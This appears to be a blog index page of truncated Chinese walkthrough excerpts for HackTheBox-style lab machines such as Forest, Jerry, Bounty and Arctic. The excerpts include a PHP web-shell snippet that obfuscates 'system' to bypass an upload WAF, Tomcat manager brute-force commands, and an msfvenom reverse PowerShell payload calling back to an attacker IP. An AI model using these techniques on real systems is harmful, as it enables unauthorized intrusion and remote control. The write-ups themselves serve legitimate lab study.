zhyann
Mercy V2 knock过滤端口解决 Tomcat用户名密码文件
实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.175 Linux 1. 信息收集80端口被过滤掉了看起来是tomcat base64解码大致意思是有个人的密码是password 访问smb服务这个看起来既是...
文件上传内容检测WAF绕过
php名字改成.gif写入GIF89a的头使用拼接绕过GIF89a <?php $a='Met'.'syS'; #把system倒过来写 $b=strtolower($a); #将a变量中的字符全部小写 $c=strrev($b); #将b变量中的字符倒过来 得到$c=...
Forest rpc用户枚举 AS-REP Roasting 域内权限提升
简介ForestDifficulty Easy 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.161 Windows 1. 信息收集PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerb...
Chatterbox AChat System http服务攻击
简介ChatterboxDifficulty Medium 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.74 Windows 1. 信息收集9225和9226都是开启的 且是AChat System http服务 2. 漏洞挖掘与利用访问9255...
Conceal IKE服务枚举 IPSec服务连接 windows文件上传
简介ConcealDifficulty Medium 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.116 Windows 1. 信息收集扫描发现没有TCP服务尝试扫描UDP服务nmap -p 1-1000 -sU 10.10.10.116先尝试扫描...
Jerry Tomcat密码爆破和.war木马利用
需要输入用户名和密码 1. 密码爆破爆破方法有两个第一个 metasploitmsfconsole use auxiliary/scanner/http/tomcat_mgr_login show options set RHOSTS 10.10.10.95 run 第二个 hydrahydra -C...
Bounty iis文件上传漏洞web.config绕过
简介SiloDifficulty Easy 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.93 Windows 1. 信息收集可以看到transfer.aspx 和 uploadedfiles 上google搜索iis exploithttps://xz.aliyu...
Silo Oracle TNS Listener漏洞利用
简介SiloDifficulty Medium 实验环境攻击者 Kali 10.10.16.18受害者 IP 10.10.10.82 Windows 1. 信息收集收集受害者服务详情使用nmap脚本判断是否有漏洞nmap -Pn -sT --script=oracle-tns-po...
Grandpa WebDAV远程代码执行
http://www.zhyann.net/index.php/2024/06/03/granny-webdav%e6%96%87%e4%bb%b6%e4%b8%8a%e4%bc%a0%e6%bc%8f%e6%b4%9e-churrasco%e6%9d%83%e9%99%90%e6%8f%90%e5%8d%87/ 信息收集和权限提升和...
Arctic Juicy Potato提权
拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...